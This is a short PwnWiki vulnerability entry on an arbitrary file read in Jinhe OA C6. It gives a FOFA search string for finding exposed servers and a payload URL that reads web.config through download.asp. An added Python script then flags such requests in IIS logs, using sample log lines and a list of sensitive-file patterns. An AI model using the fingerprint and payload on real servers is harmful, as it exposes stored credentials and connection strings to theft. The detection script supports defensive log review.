Jinhe OA C6 download.jsp arbitrary file reading vulnerability

From PwnWiki

Vulnerability Impact

Jinhe OA

FOFA

app="Jinher-OA"

Payload

Read web.config:

/C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=/c6/web.config
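
Detection

The following is an added example, not part of the original page or of the vendor's code: a log review script that flags requests to the endpoint shown above in IIS W3C logs. The field layout, the SENSITIVE pattern list and the sample log lines are assumptions constructed for illustration.

```python
from urllib.parse import parse_qs, unquote

# Endpoint and parameter name taken from the payload on this page.
ENDPOINT = "/c6/jhsoft.web.module/testbill/dj/download.asp"
PARAM = "filename"
# Assumption: patterns treated as sensitive; tune for your deployment.
SENSITIVE = ("web.config", "..", ".mdb", ".bak", "global.asa")

def find_download_reads(log_lines):
    """Return one hit per filename value requested from the endpoint.

    Each hit holds the client IP, the normalised filename, the HTTP status
    and whether the filename matches a sensitive pattern.
    """
    fields, hits = [], []
    for line in log_lines:
        line = line.strip()
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column layout can change mid-file
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split(" ")))
        if row.get("cs-uri-stem", "").lower() != ENDPOINT:
            continue
        # parse_qs decodes once; parameter names are matched case-insensitively.
        query = parse_qs(row.get("cs-uri-query", "-"))
        params = {k.lower(): v for k, v in query.items()}
        for value in params.get(PARAM, []):
            # Second decode catches double-encoded values; unify separators.
            name = unquote(value).replace("\\", "/").lower()
            hits.append({
                "client": row.get("c-ip"),
                "filename": name,
                "status": row.get("sc-status"),
                "sensitive": any(s in name for s in SENSITIVE),
            })
    return hits

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE = [
    "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status",
    "2024-01-01 10:00:00 203.0.113.7 GET /C6/Jhsoft.Web.module/testbill/dj/download.asp filename=/c6/web.config 200",
    "2024-01-01 10:00:05 198.51.100.4 GET /C6/Jhsoft.Web.module/testbill/dj/download.asp FileName=%252fc6%252fWeb.Config 200",
    "2024-01-01 10:00:09 192.0.2.10 GET /C6/Jhsoft.Web.module/testbill/dj/download.asp filename=report.xls 200",
    "2024-01-01 10:00:12 192.0.2.10 GET /C6/index.aspx - 200",
]
```

A hit with sensitive set to True and status 200 means the configuration file was likely returned, so any credentials or connection strings stored in it should be treated as exposed.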